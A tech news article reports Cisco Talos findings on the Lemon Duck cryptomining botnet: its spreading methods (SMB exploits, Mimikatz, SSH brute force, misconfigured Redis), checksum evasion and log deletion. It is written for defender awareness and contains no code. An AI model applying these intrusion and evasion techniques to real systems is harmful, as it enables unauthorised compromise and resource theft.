Security Market Segment LS
Wednesday, 14 October 2020 08:09

Cisco duo find cryptocurrency-mining botnet that can hit Windows and Linux

Cisco duo find cryptocurrency-mining botnet that can hit Windows and Linux Image by Manfred Richter from Pixabay

A cryptocurrency-mining botnet known as Lemon Duck has been displaying increased activity since the end of August, researchers from Cisco's Talos Intelligence Group say, adding that while defenders would have spotted this activity, it would not have been noticed by end users.

Vanja Svajcer and Caitlin Huey pointed out in a detailed blog post on Tuesday that the end-game of the multi-modular botnet was to steal computer resources to mine the monero cryptocurrency.

The attackers behind Lemon Duck used a number of ways to spread across networks, such as sending infected RTF files using email, psexec, WMI and SMB exploits, including the EternalBlue and SMBGhost threats that affect Windows 10 machines.

"Some variants also support RDP brute-forcing," the pair wrote. "In recent attacks we observed, this functionality was omitted. The adversary also uses tools such as Mimikatz, that help the botnet increase the amount of systems participating in its mining pool."

They said they identified activity associated with the mining malware affecting three different companies in the government, retail, and technology sectors, with the activity taking place from late March 2020 to the present.

The botnet could establish a presence on either Windows or Linux servers, the researchers said, and provided a list of the vectors which the malware used to establish a presence.

The infection began with a PowerShell script that was copied from other infected systems using SMB, email or external USB drives. A number of exploits, among them EternalBlue and SMBGhost were used; while the code for the Bluekeep flaw was present, it was disabled in the version that Svajcer and Huey took apart.

Lemon Duck had executable modules that were downloaded and installed. The email-spreading module used COVID-19 subject lines and an infected attachment was sent to all contacts in a user's Outlook address book.

The researchers outlined three Linux vectors; Redis, an open-source in-memory data structure store; YARN, a third-party package manager, and sshcopy. Windows vectors are listed in the graphic below.

windows vectorsSvajcer and Huey said the SSH spread was driven by the list of known passwords to attempt with the addition of the Plink component of the Putty SSH client. "Plink is a scriptable command-line SSH client used to target Linux-based SSH servers using the root username," they explained.

"Plink can often be detected as a potentially unwanted application by anti-malware software. Lemon Duck appends 100 randomly generated bytes to the downloaded Plink executable, likely to break the cryptographic checksum-based detections. The remote command will download and launch the first stage of the bash script Lemon Duck loader for Linux systems."

They said a similar strategy was used to target systems running YARN and Redis. "With YARN, the actors attempt to exploit a vulnerability from 2018 that does not have a CVE number attached. If the exploitation is successful, a script to download and launch the Linux loader is executed.

"Lemon Duck targets incorrectly configured Redis key-value database installations that do not require a password for connections. Once successfully connected, the spreader creates a cron job to automatically run the same Linux download and execute code for the main Linux loader module."

The botnet also has modules for email spreading, a module to kill processes that could interfere with its operation, an executable dropper, and a Python pyinstaller module.

Two shell scripts were downloaded to infected Linux systems, one which terminated any competing cryptocurrency miners that were running and also stopped and removed cloud security agents from Alibaba and Tencent.

The second script downloaded the XMRig miner and then tried to delete various system logs.

"Defenders need to be constantly vigilant and monitor the behaviour of systems within their network to spot new resource-stealing threats such as cryptominers," Svajcer and Huey said.

"Cryptocurrency-mining botnets can be costly in terms of the stolen computing cycles and power consumption costs.

"While organisations need to be focused on protecting their most valuable assets, they should not ignore threats that are not particularly targeted toward their infrastructure."

Subscribe to ITWIRE UPDATE Newsletter here

Now’s the Time for 400G Migration

The optical fibre community is anxiously awaiting the benefits that 400G capacity per wavelength will bring to existing and future fibre optic networks.

Nearly every business wants to leverage the latest in digital offerings to remain competitive in their respective markets and to provide support for fast and ever-increasing demands for data capacity. 400G is the answer.

Initial challenges are associated with supporting such project and upgrades to fulfil the promise of higher-capacity transport.

The foundation of optical networking infrastructure includes coherent optical transceivers and digital signal processing (DSP), mux/demux, ROADM, and optical amplifiers, all of which must be able to support 400G capacity.

With today’s proprietary power-hungry and high cost transceivers and DSP, how is migration to 400G networks going to be a viable option?

PacketLight's next-generation standardised solutions may be the answer. Click below to read the full article.


WEBINAR PROMOTION ON ITWIRE: It's all about webinars

These days our customers Advertising & Marketing campaigns are mainly focussed on webinars.

If you wish to promote a Webinar we recommend at least a 2 week campaign prior to your event.

The iTWire campaign will include extensive adverts on our News Site and prominent Newsletter promotion and Promotional News & Editorial.

This coupled with the new capabilities 5G brings opens up huge opportunities for both network operators and enterprise organisations.

We have a Webinar Business Booster Pack and other supportive programs.

We look forward to discussing your campaign goals with you.


Sam Varghese

website statistics

Sam Varghese has been writing for iTWire since 2006, a year after the site came into existence. For nearly a decade thereafter, he wrote mostly about free and open source software, based on his own use of this genre of software. Since May 2016, he has been writing across many areas of technology. He has been a journalist for nearly 40 years in India (Indian Express and Deccan Herald), the UAE (Khaleej Times) and Australia (Daily Commercial News (now defunct) and The Age). His personal blog is titled Irregular Expression.

Share News tips for the iTWire Journalists? Your tip will be anonymous




Guest Opinion

Guest Interviews

Guest Reviews

Guest Research

Guest Research & Case Studies

Channel News